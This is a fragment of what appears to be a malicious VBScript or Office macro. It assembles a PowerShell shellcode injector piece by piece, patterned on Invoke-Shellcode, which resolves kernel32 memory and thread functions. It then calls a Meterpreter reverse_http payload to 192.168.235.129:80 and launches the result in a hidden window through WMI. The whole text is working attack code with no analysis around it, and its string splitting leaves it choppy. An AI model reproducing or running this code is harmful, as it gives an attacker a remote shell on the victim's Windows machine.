e = e + " [System.Runtime.InteropServices.Marshal]::GetDele"
e = e + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
e = e + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
e = e + "ouldContinue( 'Do you wish to carry out your evil "
e = e + "plans?',"
"Injecting shellcode in"
e = e + "jecting into $((Get-Process -Id $ProcessId).Proces"
e = e + "sName) ($ProcessId)!" ) )
{
"
e = e + "Inject-RemoteShellcode $ProcessId"
}
"
e = e + "}"
Else
{
$VirtualAllocAddr = Ge"
e = e + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
e = e + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
e = e + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
e = e + " $VirtualAlloc = [System.Runtime.InteropServices."
e = e + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
e = e + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
e = e + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
e = e + ""
$VirtualFreeDelegate = Get-DelegateType "
e = e + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
e = e + "$VirtualFree = [System.Runtime.InteropServices.Mar"
e = e + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
e = e + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
e = e + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
e = e + " $CreateThreadDelegate = Get-DelegateType @("
e = e + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
e = e + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
e = e + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
e = e + "orFunctionPointer($CreateThreadAddr, $CreateThread"
e = e + "Delegate)"
$WaitForSingleObjectAddr = Get-"
e = e + "ProcAddress kernel32.dll WaitForSingleObject"
"
e = e + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
e = e + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
e = e + "ngleObject = [System.Runtime.InteropServices.Marsh"
e = e + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
e = e + "bjectAddr, $WaitForSingleObjectDelegate)"
"
e = e + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
e = e + "wish to carry out your evil plans?',"
"
e = e + " "Injecting shellcode into the running PowerSh"
e = e + "ell process!" ) )
{
Inject-L"
e = e + "ocalShellcode"
}
}
}
Invoke-Shell"
e = e + "code -Payload windows/meterpreter/reverse_http -Lh"
e = e + "ost 192.168.235.129 -Lport 80 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create e, Null, objConfig, intProcessID
End Function